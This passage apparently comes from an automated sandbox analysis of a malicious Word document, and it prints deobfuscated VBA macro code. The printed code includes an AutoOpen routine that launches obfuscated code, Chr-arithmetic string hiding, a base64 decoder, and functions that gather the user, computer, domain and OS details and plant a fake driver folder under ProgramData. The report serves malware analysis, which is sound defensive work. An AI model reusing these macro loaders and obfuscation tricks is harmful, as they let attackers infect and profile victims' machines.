48	Const AS9fvfrob = 2	executed
49	Const AT6yshkqzy = 1
50	Dim AU3sjrvsqt3j
51	Set AU3sjrvsqt3j = CreateObject((Chr(- 94 + 159) & Chr(3 + 65) & Chr(- 12 + 91) & Chr(60 + 8) & Chr(- 85 + 151) & Chr(38 + 8) & Chr(- 2 + 85) & Chr(20 + 96) & Chr(68 + 46) & Chr(83 + 18) & Chr(- 71 + 168) & Chr(62 + 47)))	CreateObject("ADODB.Stream") Chr executed
52	AU3sjrvsqt3j.Type = AS9fvfrob	Type AS9fvfrob
53	AU3sjrvsqt3j.Charset = (Chr(17 + 100) & Chr(56 + 59) & Chr(71 + - 26) & Chr(- 16 + 113) & Chr(- 88 + 203) & Chr(- 14 + 113) & Chr(48 + 57) & Chr(- 19 + 124))	Charset Chr
54	AU3sjrvsqt3j.Open	Stream.Open() executed
55	AU3sjrvsqt3j.WriteText Text	WriteText
56	AU3sjrvsqt3j.Position = 0	Position
57	AU3sjrvsqt3j.Type = AT6yshkqzy	Type AT6yshkqzy
58	AU3sjrvsqt3j.Position = 0	Position
59	AR4ql6nqd = AU3sjrvsqt3j.Read	Read
60	Set AU3sjrvsqt3j = Nothing
61	End Function

Subroutine AutoOpen, APIs: 9, Strings: 2, Number of lines: 3, Relevance: 28.003

APIs	Meta Information
Run	Microsoft Word:Application.Run("BH5qxufh333W99fghjplkWrtqzzY")
Part of subcall function AP6fuezipn4@NewMacros: CreateObject
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: CreateElement
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: dataType
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: Text
Part of subcall function AP6fuezipn4@NewMacros: nodeTypedValue

Strings	Decrypted Strings
"BH5qxufh3"
"MzNXOTlmZw=="

Line	Instruction	Meta Information
627	Sub AutoOpen()
628	Application.Run ("BH5qxufh3" + (AP6fuezipn4("MzNXOTlmZw==") & "hj" & "" & "plkWrtqzzY"))	Microsoft Word:Application.Run("BH5qxufh333W99fghjplkWrtqzzY") executed
629	End Sub

Function clearStr, APIs: 5, Strings: 3, Number of lines: 9, Relevance: 26.009

APIs	Meta Information
CreateObject	CreateObject("VBScript.RegExp")
ignoreCase
Global
Pattern
Replace	IRegExp2.Replace("MTc1ODgzNzIyNA==","") -> MTc1ODgzNzIyNA

Strings	Decrypted Strings
"VBScript.RegExp"
"[^\w]+"
""""

Line	Instruction	Meta Information
105	Function clearStr(Value as String) as String
106	On Error Resume Next	executed
107	Dim RE as Object
108	Set RE = CreateObject("VBScript.RegExp")	CreateObject("VBScript.RegExp") executed
109	RE.ignoreCase = True	ignoreCase
110	RE.Global = True	Global
111	RE.Pattern = "[^\w]+"	Pattern
112	clearStr = RE.Replace(Value, "")	IRegExp2.Replace("MTc1ODgzNzIyNA==","") -> MTc1ODgzNzIyNA executed
113	End Function

Subroutine folderInit, APIs: 6, Strings: 2, Number of lines: 16, Relevance: 24.016

APIs	Meta Information
CreateObject	CreateObject("WScript.Shell")
ExpandEnvironmentStrings	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData
Part of subcall function CreateDir@NewMacros: Dir
Part of subcall function CreateDir@NewMacros: vbDirectory
Part of subcall function CreateDir@NewMacros: MkDir
FreeFile

Strings	Decrypted Strings
"WScript.Shell"
"%ALLUSERSPROFILE%"

Line	Instruction	Meta Information
178	Sub folderInit()
179	On Error Resume Next	executed
180	Set sh = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
181	Dim FileNumber, figName
182	Dim WorkPath as String
183	WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	IWshShell3.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") -> C:\ProgramData executed
184	WorkPath = WorkPath & "\TransbaseOdbcDriver"
185	Dim statMkDir as Boolean
186	statMkDir = CreateDir(WorkPath)
187	If statMkDir Then
188	FileNumber = FreeFile	FreeFile
189	figName = WorkPath & "\LanCradDriver.ini"
190	Open figName For Output As # FileNumber
191	Close # FileNumber
192	Endif
193	End Sub

Function GetUserData, APIs: 1, Strings: 2, Number of lines: 4, Relevance: 7.004

APIs	Meta Information
Environ$

Strings	Decrypted Strings
"USERNAME"
"UserName: "

Line	Instruction	Meta Information
131	Function GetUserData() as String
132	On Error Resume Next	executed
133	GetUserData = "UserName: " & Environ$("USERNAME") & " \| " & "ComputerName: " & Environ$("COMPUTERNAME") & " \| " & "UserDomain: " & Environ$("USERDOMAIN")	Environ$
136	End Function

Function IsWin32OrWin64, APIs: 2, Strings: 2, Number of lines: 11, Relevance: 10.511

APIs	Meta Information
ExecQuery	SWbemServicesEx.ExecQuery("SELECT * FROM Win32_Processor")
AddressWidth

Strings	Decrypted Strings
"SELECT * FROM Win32_Processor"
"Winmgmts:"

Line	Instruction	Meta Information
92	Public Function IsWin32OrWin64() as String
93	On Error Resume Next	executed
94	Dim proc_query as String
95	Dim proc_results as Object
96	Dim info as Object
98	proc_query = "SELECT * FROM Win32_Processor"
99	Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)	SWbemServicesEx.ExecQuery("SELECT * FROM Win32_Processor") executed
100	For Each info in proc_results
101	IsWin32OrWin64 = info.AddressWidth & "-bit"	AddressWidth
102	Next info
103	End Function

Function CreateDir, APIs: 3, Strings: 1, Number of lines: 10, Relevance: 6.01

APIs	Meta Information
Dir
vbDirectory
MkDir

Strings	Decrypted Strings
""""

Line	Instruction	Meta Information
167	Function CreateDir(YourPath as String) as Boolean
168	On Error Goto EndNow	executed
169	If Dir(YourPath, vbDirectory) = "" Then	Dir vbDirectory
170	MkDir (YourPath)	MkDir
171	Endif
172	CreateDir = True
173	Exit Function
173	EndNow:
175	CreateDir = False
176	End Function

Function getOS, APIs: 2, Strings: 2, Number of lines: 8, Relevance: 6.008

APIs	Meta Information
InstancesOf
Caption

Strings	Decrypted Strings
"Win32_OperatingSystem"
"winmgmts:"

Line	Instruction	Meta Information
83	Function getOS() as String
84	On Error Resume Next	executed
85	Dim OS
86	For Each OS in GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")	InstancesOf
87	getOS = OS.Caption	Caption
88	Next OS	InstancesOf
89	Set OS = Nothing
90	End Function

Non-Executed Functions

Subroutine Workbook_Open, APIs: 10, Strings: 2, Number of lines: 3, Relevance: 22.753

APIs	Meta Information
Run
Part of subcall function AP6fuezipn4@NewMacros: CreateObject
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: CreateElement
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: dataType
Part of subcall function AP6fuezipn4@NewMacros: Chr
Part of subcall function AP6fuezipn4@NewMacros: Text
Part of subcall function AP6fuezipn4@NewMacros: nodeTypedValue
Chr

Strings	Decrypted Strings
"BH5qxufh3"
"MzNXOTlm"

Line	Instruction	Meta Information
631	Sub Workbook_Open()
632	Application.Run ("BH5qxufh3" + (AP6fuezipn4("MzNXOTlm") & "ghj" & Chr(- 89 + 201) & Chr(- 66 + 174) & Chr(12 + 95) & "WrtqzzY"))	Run Chr
633	End Sub

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static OLE Info

General

OLE File "form.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 113240

General

VBA Code with Deobfuscations

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 1097

General

VBA Code with Deobfuscations

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 408

General

Stream Path: 1Table, File Type: data, Stream Size: 16769

General

Stream Path: Data, File Type: data, Stream Size: 79536

General

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 430

General

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71

General

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4592

General

Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 54629

General

Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 203

General

Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 220

General

Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 66

General

Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 832